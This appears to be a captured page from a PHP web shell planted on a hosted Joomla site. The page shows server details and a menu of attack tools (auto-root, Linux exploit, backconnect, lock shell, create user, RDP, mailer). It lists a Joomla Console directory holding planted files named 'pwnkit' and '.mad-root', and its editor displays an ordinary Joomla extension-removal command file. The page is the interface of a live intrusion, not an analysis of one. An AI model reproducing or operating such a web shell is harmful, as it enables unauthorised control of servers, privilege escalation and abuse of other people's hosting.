Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
Console /
[ HOME SHELL ]
Name
Size
Permission
Action
Loader
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AddUserCommand.php
6.91
KB
-rw----r--
AddUserToGroupCommand.php
6.53
KB
-rw----r--
ChangeUserPasswordCommand.php
3.78
KB
-rw----r--
CheckJoomlaUpdatesCommand.php
3.11
KB
-rw----r--
CheckUpdatesCommand.php
2.17
KB
-rw----r--
CleanCacheCommand.php
1.69
KB
-rw----r--
DeleteUserCommand.php
4.56
KB
-rw----r--
ExtensionDiscoverCommand.php
3.16
KB
-rw----r--
ExtensionDiscoverInstallComman...
5.5
KB
-rw----r--
ExtensionDiscoverListCommand.p...
2.55
KB
-rw----r--
ExtensionInstallCommand.php
5.05
KB
-rw----r--
ExtensionRemoveCommand.php
4.67
KB
-rw----r--
ExtensionsListCommand.php
5.2
KB
-rw----r--
FinderIndexCommand.php
12.47
KB
-rw----r--
GetConfigurationCommand.php
7.36
KB
-rw----r--
ListUserCommand.php
3.05
KB
-rw----r--
RemoveOldFilesCommand.php
4.1
KB
-rw----r--
RemoveUserFromGroupCommand.php
7
KB
-rw----r--
SessionGcCommand.php
3.24
KB
-rw----r--
SessionMetadataGcCommand.php
2.57
KB
-rw----r--
SetConfigurationCommand.php
10.14
KB
-rw----r--
SiteDownCommand.php
2.45
KB
-rw----r--
SiteUpCommand.php
2.42
KB
-rw----r--
UpdateCoreCommand.php
7.77
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ExtensionRemoveCommand.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2020 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Console; \defined('JPATH_PLATFORM') or die; use Joomla\CMS\Factory; use Joomla\CMS\Installer\Installer; use Joomla\CMS\Language\Text; use Joomla\Console\Command\AbstractCommand; use Symfony\Component\Console\Input\InputArgument; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; use Symfony\Component\Console\Style\SymfonyStyle; /** * Console command for removing extensions * * @since 4.0.0 */ class ExtensionRemoveCommand extends AbstractCommand { /** * The default command name * * @var string * @since 4.0.0 */ protected static $defaultName = 'extension:remove'; /** * @var InputInterface * @since version */ private $cliInput; /** * @var SymfonyStyle * @since version */ private $ioStyle; /** * Exit Code for extensions remove abort * @since */ public const REMOVE_ABORT = 3; /** * Exit Code for extensions remove failure * @since */ public const REMOVE_FAILED = 1; /** * Exit Code for invalid response * @since */ public const REMOVE_INVALID_RESPONSE = 5; /** * Exit Code for invalid type * @since */ public const REMOVE_INVALID_TYPE = 6; /** * Exit Code for extensions locked remove failure * @since */ public const REMOVE_LOCKED = 4; /** * Exit Code for extensions not found * @since */ public const REMOVE_NOT_FOUND = 2; /** * Exit Code for extensions remove success * @since */ public const REMOVE_SUCCESSFUL = 0; /** * Configures the IO * * @param InputInterface $input Console Input * @param OutputInterface $output Console Output * * @return void * * @since 4.0.0 * */ private function configureIO(InputInterface $input, OutputInterface $output): void { $this->cliInput = $input; $this->ioStyle = new SymfonyStyle($input, $output); $language = Factory::getLanguage(); $language->load('', JPATH_ADMINISTRATOR, null, false, false) || $language->load('', JPATH_ADMINISTRATOR, null, true); $language->load('com_installer', JPATH_ADMINISTRATOR, null, false, false)|| $language->load('com_installer', JPATH_ADMINISTRATOR, null, true); } /** * Initialise the command. * * @return void * * @since 4.0.0 */ protected function configure(): void { $this->addArgument( 'extensionId', InputArgument::REQUIRED, 'ID of extension to be removed (run extension:list command to check)' ); $help = "<info>%command.name%</info> is used to uninstall extensions. \nThe command requires one argument, the ID of the extension to uninstall. \nYou may find this ID by running the <info>extension:list</info> command. \nUsage: <info>php %command.full_name% <extension_id></info>"; $this->setDescription('Remove an extension'); $this->setHelp($help); } /** * Internal function to execute the command. * * @param InputInterface $input The input to inject into the command. * @param OutputInterface $output The output to inject into the command. * * @return integer The command exit code * * @since 4.0.0 */ protected function doExecute(InputInterface $input, OutputInterface $output): int { $this->configureIO($input, $output); $extensionId = $this->cliInput->getArgument('extensionId'); $response = $this->ioStyle->ask('Are you sure you want to remove this extension?', 'yes/no'); if (strtolower($response) === 'yes') { // Get an installer object for the extension type $installer = Installer::getInstance(); $row = new \Joomla\CMS\Table\Extension(Factory::getDbo()); if ((int) $extensionId === 0 || !$row->load($extensionId)) { $this->ioStyle->error("Extension with ID of $extensionId not found."); return self::REMOVE_NOT_FOUND; } // Do not allow to uninstall locked extensions. if ((int) $row->locked === 1) { $this->ioStyle->error(Text::sprintf('COM_INSTALLER_UNINSTALL_ERROR_LOCKED_EXTENSION', $row->name, $extensionId)); return self::REMOVE_LOCKED; } if ($row->type) { if (!$installer->uninstall($row->type, $extensionId)) { $this->ioStyle->error('Extension not removed.'); return self::REMOVE_FAILED; } $this->ioStyle->success('Extension removed!'); return self::REMOVE_SUCCESSFUL; } return self::REMOVE_INVALID_TYPE; } elseif (strtolower($response) === 'no') { $this->ioStyle->note('Extension not removed.'); return self::REMOVE_ABORT; } $this->ioStyle->warning('Invalid response'); return self::REMOVE_INVALID_RESPONSE; } }
Close